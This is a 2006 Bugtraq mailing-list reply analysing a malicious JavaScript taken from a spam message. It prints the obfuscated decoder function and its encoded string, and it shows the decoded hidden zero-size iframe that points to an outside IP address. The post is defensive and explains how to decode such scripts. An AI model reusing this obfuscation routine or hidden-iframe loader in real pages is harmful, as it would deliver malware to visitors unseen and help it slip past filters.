Date: Sat, 18 Feb 2006 10:18:35 -0500 (EST)
From: Jose Nazario <jose@...key.org>
To: gandalf@...ital.net
Cc: bugtraq@...urityfocus.com
Subject: Re: Java script exploit


ps, this decodes to the following HTML snippet (i have deliberately
obfuscated the tags):

[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]

here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
port for OpenBSD years ago, and the source is available for all at

        http://www.njs-javascript.org/

i extracted the javascript functions from the forwarded message and loaded
it into a file, bad2.js:

$ cat bad2.js
function dc(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49
,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9
,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,
39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r)		// JN no document object
print(r);			// JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT')

i made some modifications to deal with the fact that there is no document
object in this context. see the "JN" comments. now when i use the
javascript toolkit, i can actually run it. it will print the decoded
string object 'r':


$ js bad2.js
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]


(tags obfuscated) this is what your browser would see and load. unless
your spam/scam detection engine also ran the javascript, it wouldn't see
that. hence, obfuscation.

hopefully this helps people out there decode questionable javascript in the
future.

________
jose nazario, ph.d.			jose@...key.org
http://monkey.org/~jose/ 		http://infosecdaily.net/
					http://www.wormblog.com/

